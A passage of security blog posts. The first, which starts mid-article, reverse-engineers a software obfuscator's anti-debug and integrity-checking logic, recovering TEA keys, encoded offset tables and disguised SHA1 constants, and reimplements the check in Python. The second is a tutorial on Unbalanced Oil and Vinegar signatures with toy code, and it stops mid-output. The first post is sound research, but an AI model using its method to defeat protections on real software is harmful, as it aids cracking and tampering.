Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300A == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.
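
The identification is straightforward to sanity-check by porting the reference routines to Python and confirming the round trip under an arbitrary key. The key and plaintext below are examples, not values recovered from the binary.

```python
# Reference TEA, ported to Python with explicit 32-bit masking.
MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9   # the key schedule constant recovered above

def tea_encrypt(v, k):
    v0, v1, s = v[0], v[1], 0
    for _ in range(32):
        s = (s + DELTA) & MASK
        v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
    return [v0, v1]

def tea_decrypt(v, k):
    v0, v1, s = v[0], v[1], 0xC6EF3720   # 32 * DELTA mod 2**32
    for _ in range(32):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        s = (s - DELTA) & MASK
    return [v0, v1]
```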

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the most significant bit to indicate whether one or more additional bytes should be read to compute the final value.
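As a quick sketch of that decoding (read_varint is our name for a hypothetical helper, not something recovered from the binary), the scheme is the familiar LEB128-style varint:

```python
def read_varint(data, pos=0):
    """Decode one base-128 unsigned integer starting at data[pos].

    Each byte contributes 7 bits of data; a set most-significant bit
    signals that another byte follows. Returns (value, next_position).
    """
    value = shift = 0
    while True:
        byte = data[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return value, pos

# 0x96 has its MSB set, so a second byte is consumed:
# (0x96 & 0x7F) | (0x01 << 7) = 0x16 | 0x80 = 150
print(read_varint(bytes([0x96, 0x01])))  # (150, 2)
```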

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0 ^ 0xF1BC54D1 ==> 0x67452301
0x752ED515 ^ 0x9AE37E9C ==> 0xEFCDAB89
0xF9396DD4 ^ 0x6183B12A ==> 0x98BADCFE
0x2A1B81B5 ^ 0x3A29D5C3 ==> 0x10325476
0xFB95EF83 ^ 0x38470E73 ==> 0xC3D2E1F0
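The underlying trick is easy to reproduce: at obfuscation time, pick a random mask r and store the pair (r, r ^ C) instead of the constant C itself. A minimal sketch (split_constant is a hypothetical helper of ours, not recovered from the binary):

```python
import random

# Standard SHA1 initialization constants
SHA1_IV = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]

def split_constant(c, bits=32):
    """Split constant c into two random-looking values whose XOR is c."""
    r = random.getrandbits(bits)
    return r, r ^ c

# Neither stored half reveals the constant on its own, defeating naive
# constant scanning, but XORing the halves at runtime restores it.
pairs = [split_constant(c) for c in SHA1_IV]
assert all(a ^ b == c for (a, b), c in zip(pairs, SHA1_IV))
```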

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity-checking logic recovered from the obfuscator was reimplemented in the Python code below, which was verified to produce the same digest as a run under the debugger or through a straightforward LLVM JIT. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64-bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped is not None and next_skipped < current + size:
      # NOTE: the comparison operators in this loop were lost to HTML-entity
      # mangling in the original listing; the condition and the size
      # bookkeeping below are reconstructed from context
      chunk = next_skipped - current
      blob = pe[pe.rva2off(current):pe.rva2off(current)+chunk]
      size -= chunk + 8
      assert size >= 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return
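The Tea class used by accumulate_bytes() is not shown in the listing; a minimal pure-Python stand-in, assuming ECB mode over 8-byte blocks with little-endian 32-bit words (our assumptions, matching the reference C code above), might look like:

```python
import struct

class Tea:
    """Minimal TEA decryption, ECB mode over 8-byte blocks."""
    DELTA = 0x9E3779B9
    MASK = 0xFFFFFFFF

    def __init__(self, key):
        # 128-bit key as four little-endian 32-bit words
        self.key = struct.unpack('<4I', key)

    def decrypt_block(self, block):
        v0, v1 = struct.unpack('<2I', block)
        k0, k1, k2, k3 = self.key
        total = (self.DELTA * 32) & self.MASK  # 0xC6EF3720
        for _ in range(32):
            v1 = (v1 - ((((v0 << 4) + k2) & self.MASK)
                        ^ ((v0 + total) & self.MASK)
                        ^ (((v0 >> 5) + k3) & self.MASK))) & self.MASK
            v0 = (v0 - ((((v1 << 4) + k0) & self.MASK)
                        ^ ((v1 + total) & self.MASK)
                        ^ (((v1 >> 5) + k1) & self.MASK))) & self.MASK
            total = (total - self.DELTA) & self.MASK
        return struct.pack('<2I', v0, v1)

    def decrypt(self, data):
        return b''.join(self.decrypt_block(data[i:i+8])
                        for i in range(0, len(data), 8))
```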

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

Demystifying Multivariate Cryptography

By: smarkelon
18 August 2023 at 16:38

As the name suggests, multivariate cryptography refers to a class of public-key cryptographic schemes that use multivariate polynomials over a finite field. Solving systems of multivariate polynomials is known to be NP-complete, thus multivariate constructions are top contenders for post-quantum cryptography standards. In fact, 11 out of the 50 submissions for NIST’s call for additional post-quantum signatures are multivariate-based. Multivariate cryptography schemes have received new interest in recent years due to the push to standardize post-quantum primitives. Sadly, the resources available online to learn about multivariate cryptography seem to fall into one of two categories: high-level overviews and academic papers. The former is fine for getting a feel for the topic, but does not give enough details to feel fully satisfied. On the other hand, the latter is chock full of details, and is rather dense and complex. This blog post aims to bridge the gap between the two types of resources by walking through an illustrative example of a multivariate digital signature scheme called Unbalanced Oil and Vinegar (UOV) signatures. UOV schemes serve as the basis for a number of contemporary multivariate signature schemes like Rainbow and MAYO. This post assumes some knowledge of cryptography (namely what a digital signature scheme is), the ability to read some Python code, and a bit of linear algebra knowledge. By the end of the post the reader should not only have a strong conceptual grasp of multivariate cryptography, but also understand how a (toy) implementation of UOV works.

Preliminaries

A multivariate quadratic (which is the degree of polynomial we concern ourselves with in multivariate cryptographic schemes) is a quadratic equation with two or more indeterminates (variables). For instance, a multivariate quadratic equation (MQ) with three indeterminates can be written as: p(x,y,z)=ax^2 + by^2 + cz^2 + dxy + exz + fyz + gx + hy + iz + j where at least one of the second-degree coefficients a,b,c,d,e,f is not equal to 0. With an MQ defined we can now describe the hard problem on which the security of MQ cryptography schemes is based – the so-called MQ problem.
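To make this concrete, the following sketch (with arbitrary illustrative coefficients, and the tiny field \mathbb{F}_7 rather than a cryptographic one) evaluates such a polynomial and finds its roots by brute force, something that quickly becomes infeasible as the field and variable count grow:

```python
def p(x, y, z, q=7):
    """An example MQ: 2x^2 + 3y^2 + z^2 + xy + 5xz + yz + 4x + y + 6z + 2 over F_q."""
    return (2*x*x + 3*y*y + z*z + x*y + 5*x*z + y*z + 4*x + y + 6*z + 2) % q

# Exhaustive search over all q^3 = 343 assignments; the MQ problem is only
# hard when the number of variables (and equations) is large.
roots = [(x, y, z) for x in range(7) for y in range(7) for z in range(7)
         if p(x, y, z) == 0]
print(f"{len(roots)} roots found, e.g. {roots[0] if roots else None}")
```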

MQ Problem
Given a finite field of q elements \mathbb{F}_{q} and m quadratic polynomials p_1,\ldots,p_m \in \mathbb{F}_q[X_1,\ldots,X_n] in n variables for m<n, find a solution (x_1,\ldots,x_n) \in \mathbb{F}^{n}_{q} of the system of equations. That is, for i=1,\ldots,m we have p_i(x_1,\ldots,x_n) = 0. The MQ problem is known to be NP-complete, and it is thought that quantum computers will not be able to solve this problem more efficiently than classical computers. However, in order to be able to design secure cryptographic schemes based on the MQ problem, we need to find a trapdoor that allows a party with some private information to efficiently solve the problem. This is like knowing the factorization of the modulus N in RSA or the discrete log in Diffie-Hellman key exchange. Generally, in multivariate public key signature schemes we define the public verification key \mathsf{pub} as an ordered collection of m multivariate quadratic polynomials in n variables over a finite field \mathbb{F}_q for n > m. That is \mathsf{pub} = p_1,\ldots,p_m \in \mathbb{F}_q [X_1,\ldots,X_n]. The verification function is then a polynomial map V_{\mathsf{pub}}: \mathbb{F}^{n}_{q} \rightarrow \mathbb{F}^{m}_q such that: V_{\mathsf{pub}}(X_1,\ldots,X_n) = (p_1(X_1,\ldots,X_n),\ldots,p_m(X_1,\ldots,X_n)). Note that our signatures will be of length n and messages (or, likely in practice, a hash of the message we are signing) will be encoded as m field elements in \mathbb{F}_q. One simply verifies signatures by ensuring that V_{\mathsf{pub}}(\mathrm{signature}) =\mathrm{message} for some message corresponding to the signature. The secret key (signing key) \mathsf{priv} is then some data on how \mathsf{pub} is generated that makes it easy to invert V_{\mathsf{pub}} and generate a valid signature for a given message. Generating a valid signature for a given message without knowledge of the secret key is exactly an instance of the MQ problem, and thus should be hard for even a quantum-capable adversary.
However, we need special structure of \mathsf{pub} to ensure that a trapdoor exists so that parties with knowledge of \mathsf{priv} be easily able to sign messages. This reduces the problem space, and thus may lead to vulnerabilities in multivariate cryptography schemes. One such design that seems to have remained secure despite years of thorough cryptanalysis is Unbalanced Oil and Vinegar signatures. We will describe the scheme in the next section and present a toy implementation and a walkthrough to see how the inner mechanisms of the scheme work.

Unbalanced Oil and Vinegar Signatures

Unbalanced Oil and Vinegar (UOV) multivariate signatures were first introduced by Kipnis, Patarin, and Goubin in 1999. One can find the original paper here. UOV is based on an earlier scheme, Oil and Vinegar signatures, introduced by Patarin in 1997. The earlier scheme was broken by a structural attack discovered by Kipnis and Shamir in 1998. However, with a slight variation of the original scheme the UOV signature scheme was created and is thought to be secure. We will now go through the parts of the signature algorithm.

UOV Parameters

We choose a small finite field \mathbb{F}_{q}, where we usually select q=2^{k} for some small power k. The n input variables (X_1,\ldots,X_n) are divided into two ordered collections, the so-called oil and vinegar variables: X_1,\ldots,X_o = O_1,\ldots,O_o and X_{o+1},\ldots,X_{o+v} = V_1,\ldots,V_v, respectively, with n=o+v. The message to be signed (or, likely, the hash of said message) is represented as an element in \mathbb{F}^{o}_{q} and is denoted m=(m_1,\ldots,m_o). The signature is then represented as an element of \mathbb{F}^{o+v}_{q} and is denoted s=(s_1,\ldots,s_{o+v}).

Private (Signing) Key

Our secret key is a pair (L,\mathcal{F}). We take L to be a bijective and affine function such that L : \mathbb{F}^{o+v}_{q} \rightarrow \mathbb{F}^{o+v}_{q}. For our purposes we can take the meaning of affine to be that the outputs of the function can be expressed as polynomials of degree one in the n=o+v indeterminates, with coefficients in the field \mathbb{F}_q. Then, \mathcal{F} (also referred to as the central map) is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j + \sum_{i} c_{i,k} O_i + \sum_{i} d_{i,k} V_i + e_k where k \in [1 \ldots o]. The coefficients a_{i,j,k}, b_{i,j,k}, c_{i,k}, d_{i,k}, e_{k} \in \mathbb{F}_{q} are selected randomly and are kept secret. Note that vinegar variables “mix” quadratically with all other variables, but oil variables never “mix” with themselves. That is, there are no O_i O_j terms, hence the name of the scheme (although one might observe that this is not how salad dressing actually works).

Public (Verification) Key

Let X be an element of \mathbb{F}^{o+v}_{q} defined in the style of our input (x_1,\ldots,x_{o+v}). We then transform X into Z = L(X) = (z_1,\ldots,z_n), where L is our secret function. Each function f_k, k \in [1 \ldots o], can be written as a polynomial P_k of total degree two in the z_j unknowns, j \in [1 \ldots n] where n=o+v. We denote our public key, \mathcal{P}, as the ordered collection of these o polynomials in n=o+v unknowns: \forall k \in [1 \ldots o] \tilde{f}_{k} = P_{k}((z_1,\ldots,z_n)). That is to say we compose \mathcal{F} with L, \mathcal{P} = \mathcal{F} \circ L. We will elucidate how this computation is actually done in our illustrative example.

Signing

We solve for a signature s=(s_1,\ldots,s_n) \in \mathbb{F}^{n}_{q} (where n=o+v) of the message (or hash of the message) m=(m_1,\ldots,m_o) \in \mathbb{F}^{o}_{q} in the following way:
1. Select random vinegar values v_{r,1},\ldots,v_{r,v} and substitute them into each of the k equations in \mathcal{F}.
2. We are then left to find the o unknowns o^{*}_1,\ldots,o^{*}_o that satisfy \mathcal{F}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}) = (m_1,\ldots,m_o). Because there are no O_i O_j terms in our private key, this is a linear system of equations in the oil variables, which can be solved using Gaussian elimination.
3. If the system is indeterminate, return to step 1.
4. Compute the signature of m=(m_1,\ldots,m_o) as s = (s_1,\ldots,s_n) = L^{-1}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}).
In brief, we invert \mathcal{P} (solve the MQ problem) by using the secret structure of \mathcal{P}, namely the fact that it is the composition of two maps, each of which is easy to invert for anyone who knows the private key.

Verification

The recipient simply checks that \mathcal{P}(s_1,\ldots,s_n) = (m_1,\ldots,m_o).

Correctness

Recall that our verification key is \mathcal{P} = \mathcal{F} \circ L, and the signing key is (\mathcal{F},L). Our signature is of the form s= L^{-1} \circ \mathcal{F}^{-1}(m). Then we can show \mathcal{F} \circ L(L^{-1} \circ \mathcal{F}^{-1}(m)) =\mathcal{F} \circ \mathcal{F}^{-1}(m) =m as desired.

Security Considerations

As mentioned above, the original Oil and Vinegar scheme, where v = o (or where v and o are quite close), is broken by the structural attack of Kipnis and Shamir. For v \geq o^{2} the scheme is also insecure, because of efficient algorithms for solving heavily under-determined quadratic systems. The current recommendation, for which no technique is known to reduce the difficulty of solving the MQ problem, is to set v = 2o or v = 3o. The scheme we examine is therefore called Unbalanced due to the fact that v \neq o.

Advantages and Problems of UOV

UOV, in addition to being thought to be quantum-resistant, provides very short signatures as compared to other post-quantum signature schemes like lattice-based and hash-based schemes. Moreover, the actual computational operations (while seemingly complex) only require additions and multiplications of small field elements that are fast and simple to implement even on constrained hardware. The largest issue with the UOV scheme is the size of the public keys. One needs to store approximately mn^{2}/2 coefficients for public keys. Techniques exist to expand about m(n^{2} - m^{2})/2 of the coefficients for the public key from a short seed, such that we only need to store m^{3}/2 coefficients. However, this is still a very large public key – about 66KB for 128 bits of security compared to just a 384-byte key for RSA at the same security level, or a 1793-byte key for the lattice-based scheme Falcon at a higher security level. Some modern candidates that use UOV as a base, and how they go about trying to solve this key size problem, will be discussed in the concluding remarks of this post.
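As a back-of-the-envelope check, the coefficient count can be computed directly. The sketch below assumes upper-triangular storage of each quadratic form (as the toy implementation later in this post uses); the exact constant depends on representation details:

```python
def uov_pk_bytes(m, n, field_bytes=1):
    """Approximate UOV public key size: m upper-triangular n x n quadratic
    forms over a field whose elements occupy field_bytes bytes each."""
    coeffs_per_polynomial = n * (n + 1) // 2  # roughly n^2 / 2
    return m * coeffs_per_polynomial * field_bytes

# The toy parameters used later in this post: o = 3, v = 6, so m = 3, n = 9
print(uov_pk_bytes(3, 9))  # 135 bytes
# Real parameter sets use much larger m and n, hence keys in the tens of KB.
```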

Illustrative Example

To illustrate how UOV signatures work, we wrote a toy implementation of the scheme in Python3. The code is available here. It goes without saying that it is just for educational purposes and should not be used in any application desiring any real level of security. We will walk through the signing process step-by-step, stopping to examine all values and intermediaries. We use NumPy to store polynomials in quadratic form, store our secret trapdoor linear transformation L, and to do linear algebra. We do note that our UOV implementation is a slight simplification of the general description we give above. We discuss this next.

Simplification

In our above presentation of the UOV scheme we define our central map \mathcal{F} such that it contains not only quadratic terms, but also linear and constant terms. As a result, the public verification key \mathcal{P} also contains said terms. For the simplified variant we set these linear and constant terms to 0, and are left with only non-zero quadratic terms; that is, our central map \mathcal{F} is a collection of homogeneous polynomials of degree two. This simplified variant of \mathcal{F} is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j where k \in [1 \ldots o] and all coefficients are in \mathbb{F}_{q}. This simplification presents a number of advantages. Namely, the components f_k of \mathcal{F} can be written as an upper-triangular matrix in \mathbb{F}_{q}^{n \times n} of quadratic forms. For the below example we set o=2,v=4.

Note that oil variables do not mix, so we have a zero block in the upper-left of this representation. Further, this allows us to define our secret transformation L to be in GL_{n}(\mathbb{F}_q) where GL is the general linear group. That is (for our purposes), L is an invertible matrix with dimensions n \times n and entries in our field \mathbb{F}_q. One can always turn a homogeneous system of polynomial equations in n variables into an equivalent system in n-1 variables by fixing one of the variables to 1; the reverse of this process is called homogenization. Thus, we still preserve the structure of the UOV signing key with this simplification. In turn, from the point of view of a key-recovery attack, the security of this simplified variant of UOV is equivalent to that of original UOV with n-1 indeterminates.

Parameters

A note on presentation: As opposed to above where we used \LaTeX typesetting for math, we will keep our mathematical notation in the prose in line with our choices in the code. That is, we will use inline code blocks to typeset variable names and math (i.e. F is our central map). We will work over the field GF(256). We use the galois package to do array arithmetic and linear algebra over the field. For more information about how to do arithmetic in Galois (finite) fields see this Wikipedia page. For this example we set o=3 and v=2o=6. These parameters are far too small to provide actual security, but work nicely for our illustrative example. Below is the parameter information our implementation spits out.

Galois Field:
  name: GF(2^8)
  characteristic: 2
  degree: 8
  order: 256
  irreducible_poly: x^8 + x^4 + x^3 + x^2 + 1
  is_primitive_poly: True
  primitive_element: x

The parameters are o=3 and v=6.

Key Generation

Private (Signing) Key

To generate the central map F, we generate o random multivariate polynomials in the style described in the simplified UOV scheme. Each polynomial is stored as an n x n = (o+v) x (o+v) NumPy matrix. The complete central map is an o-length list of these matrices.

def generate_random_polynomial(o,v):
    f_i = np.vstack(
    (np.hstack((np.zeros((o,o),dtype=np.uint8),np.random.randint(256, size=(o,v), dtype=np.uint8))),
    np.random.randint(256, size=(v,v+o),dtype=np.uint8))
    )
    f_i_triu = np.triu(f_i)
    return GF256(f_i_triu)

def generate_central_map(o,v):
    F = []
    for _ in range(o):
        F.append(generate_random_polynomial(o,v))
    return F

To generate our secret transformation L, we generate a random n x n matrix and ensure that it is invertible, as this will be necessary to compute signatures.

def generate_affine_L(o,v):
    found = False
    while not found:
        try:
            L_n = np.random.randint(256, size=(o+v,o+v), dtype=np.uint8)
            L = GF256(L_n)
            L_inv = np.linalg.inv(L)
            found = True
        except:
            found = False
    return L, L_inv

Then, we have a wrapper function that generates our private key using the above functions as the triple (F, L, L_inv). We deviate from the standard definition of the signing key by also storing the inverse of L, denoted L_inv.

def generate_private_key(o,v): 
    F = generate_central_map(o,v)
    L, L_inv = generate_affine_L(o,v)
    return F, L, L_inv

When we run this key generation code for our simple example, we get the following private key. We can see that F is three homogeneous quadratics, where the entries in the matrices represent the coefficients of said quadratics. Note the 0 entries where oil-oil terms would have coefficients (they do not mix)! Moreover, we only need an upper-triangular matrix, as i,j and j,i for all i,j in [1...n] would specify the same coefficient.

Private Key:

F (Central Map) = 
0:
 [[  0   0   0 153 175 153  51 224  89]
 [  0   0   0  20 143  18 179  13 175]
 [  0   0   0  74 231 146 106 136 149]
 [  0   0   0 248 197  59  50  41  57]
 [  0   0   0   0 213  77 187 165  54]
 [  0   0   0   0   0  97 154  37 163]
 [  0   0   0   0   0   0  93 246  71]
 [  0   0   0   0   0   0   0 181 188]
 [  0   0   0   0   0   0   0   0   3]]

1:
 [[  0   0   0  71  26 115   9 248 114]
 [  0   0   0  31  53 162  77  82  46]
 [  0   0   0 254 178  43 219 124 196]
 [  0   0   0 150  85 216  38  28 197]
 [  0   0   0   0 147  73 216 111  98]
 [  0   0   0   0   0  30 140 222  36]
 [  0   0   0   0   0   0 108  54 105]
 [  0   0   0   0   0   0   0 253  38]
 [  0   0   0   0   0   0   0   0  55]]

2:
 [[  0   0   0  98  27 252 165  31  42]
 [  0   0   0 180 169 247 143 217 128]
 [  0   0   0  13 111  90  98  40 233]
 [  0   0   0 223 243 229 156 183  45]
 [  0   0   0   0  40 136  12 123  44]
 [  0   0   0   0   0 251  92  77 174]
 [  0   0   0   0   0   0  81 150  95]
 [  0   0   0   0   0   0   0 196 207]
 [  0   0   0   0   0   0   0   0 108]]

Further, we show L and L_inv and confirm that they were generated correctly as their product is the identity matrix, that is L · L_inv= I.

Secret Transformation L=:
[[  0 207  67 204  15  76 173  14  42]
 [193  54  49  19  64 222  93 165 108]
 [102 211 114  71  22 229 187 221 194]
 [196 251  77 219 159   4 110 107 241]
 [ 78  88  49 133 238 243  17 125 203]
 [ 95 159 145 105 221  55 185 165  24]
 [ 45  55  31  37 149 168   4  21  48]
 [163 127 150 135  56 210 241 110  25]
 [222   3 207 202 136  66 121  18 119]]

Secret Inverse Transformation L_inv=:
[[127 172  42  59  73  10 183 116  70]
 [ 33 153 229 239 106  99 227  54  51]
 [218 196 248  10 124  46  25  73 128]
 [ 15  36 200  28 138 156 210 164 229]
 [114 107 134 126  40 230 238 249  70]
 [ 88 100  51 161 145  52 157 138 130]
 [208 188  30 227  66 116 191 100 183]
 [172  88 227 121 142 132 247 223  18]
 [138 145 247 168 180  35 185 149  67]]

Confirming L is invertible as L*L_inv is I=:
 [[1 0 0 0 0 0 0 0 0]
